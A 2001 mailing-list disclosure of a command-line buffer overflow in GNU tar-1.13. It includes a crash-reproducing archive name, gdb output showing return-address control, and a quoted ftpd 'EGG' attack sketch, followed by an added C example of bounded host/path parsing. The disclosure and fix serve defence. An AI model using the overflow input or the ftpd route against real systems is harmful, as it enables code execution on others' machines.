bug-gnu-utils

buffer overflow in GNU tar-1.13


From: Antonomasia
Subject: buffer overflow in GNU tar-1.13
Date: Fri, 19 Jan 2001 07:54:05 GMT

Software Maintainers,

GNU tar-1.13 contains a buffer overflow in output filenames where rsh
(or similar commands) are called.  (The rsh connection is not required
to succeed to demonstrate this bug.)

I published an exploit of this form for tar-1.12 in February 1999 on
the linux-security-audit list.  I think I also notified a bugs address
at GNU around the same time but can find no record of this.
Because tar is not set[ug]id and this overflow is on the command line
(rather than in handling a file you might receive) I considered it a
curiosity with no security implications.  Interaction with ftpd would
change that model drastically as mentioned at the end of this email.


$ ./tar cvf localhost:/ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZABCDEFGHI /tmp
sh: Host name lookup failure
Segmentation fault (core dumped)


$ gdb ./tar core
GNU gdb 4.17
Core was generated by `./tar cvf localhost:/ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ'.
Program terminated with signal 11, Segmentation fault.
find_solib: Can't read pathname for load map: Input/output error

#0  0x35360a49 in ?? ()
(gdb) bt
#0  0x35360a49 in ?? ()
Cannot access memory at address 0x48474645.


Alan Cox pointed out (in 1999) implications for interaction with ftpd.

AC> I've raised this one with Cert, but not to the list because there is a true
AC> horror of a problem you've found.
AC> 
AC> Consider
AC> 
AC> ftp some.site.net
AC> login anonymous
AC> password blahblah
AC> cd incoming
AC> mkdir $EGG
AC> get $EGG.tar


--
##############################################################
# Antonomasia   address@hidden                      #
# See http://www.notatla.demon.co.uk/                        #
##############################################################
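Added example, not GNU tar's code: the gdb output above shows the saved frame pointer and return address overwritten with bytes from the archive name (0x48474645 is "EFGH" read little-endian on x86), which is what a fixed-size copy of "host:path" without a length check produces. The code below does the same split and rsh command construction with both copies bounded, so a name shaped like the one that crashed tar is refused instead of written past the buffer. The buffer sizes, helper names, the "first colon separates host from path" convention and the rsh command shape are assumptions made for this example, not taken from tar.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Hypothetical fixed buffer sizes chosen for the example, not tar's. */
#define HOST_BUF 64
#define PATH_BUF 64
#define CMD_BUF  128

/* Split "host:path" into a bounded host buffer and a pointer to path.
 * Assumed convention: the first ':' separates host from path.
 * Returns 0 on success, 1 if there is no ':' (local archive), and -1 if
 * the host part is empty or would not fit in host_size bytes.
 * The crash in the report is what an unchecked strcpy() here does. */
int split_remote_name(const char *name, char *host, size_t host_size,
                      const char **path)
{
    const char *colon = strchr(name, ':');
    if (colon == NULL)
        return 1;
    size_t host_len = (size_t)(colon - name);
    if (host_len == 0 || host_len >= host_size)   /* keep room for NUL */
        return -1;
    memcpy(host, name, host_len);
    host[host_len] = '\0';
    *path = colon + 1;
    return 0;
}

/* Build the remote-helper command line into cmd.  snprintf() returns the
 * length it wanted to write, so a value >= cmd_size means truncation:
 * refuse rather than run a mangled command.  Returns 0 or -1. */
int build_remote_command(const char *host, char *cmd, size_t cmd_size)
{
    int n = snprintf(cmd, cmd_size, "rsh %s -n /etc/rmt", host);
    if (n < 0 || (size_t)n >= cmd_size) {
        if (cmd_size > 0)
            cmd[0] = '\0';
        return -1;
    }
    return 0;
}

/* End-to-end check for one archive name: 1 = local archive, 0 = remote
 * and command built into cmd, -1 = rejected as oversized or malformed. */
int prepare_archive(const char *name, char *cmd, size_t cmd_size)
{
    char host[HOST_BUF];
    const char *path;
    int rc = split_remote_name(name, host, sizeof host, &path);
    if (rc != 0)
        return rc;
    /* The path is handed to the remote helper later, so bound it too;
     * this is the part of the name that was oversized in the report. */
    if (strlen(path) >= PATH_BUF)
        return -1;
    return build_remote_command(host, cmd, cmd_size);
}

int main(void)
{
    /* Constructed inputs: a normal remote name and one shaped like the
     * crashing name in the report (a long run of 'Z', then ABCDEFGHI). */
    char cmd[CMD_BUF];
    char bad[128] = "localhost:/";
    memset(bad + strlen(bad), 'Z', 58);
    strcat(bad, "ABCDEFGHI");

    printf("%d  localhost:/tmp/a.tar -> %s\n",
           prepare_archive("localhost:/tmp/a.tar", cmd, sizeof cmd), cmd);
    printf("%d  /tmp/a.tar (local)\n",
           prepare_archive("/tmp/a.tar", cmd, sizeof cmd));
    printf("%d  %s (rejected)\n", prepare_archive(bad, cmd, sizeof cmd), bad);
    return 0;
}
```

The two checks that matter are the `host_len >= host_size` comparison before the copy and the `n >= cmd_size` comparison after `snprintf()`; the second one is easy to forget because `snprintf()` never overflows, but a silently truncated command is still a bug.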
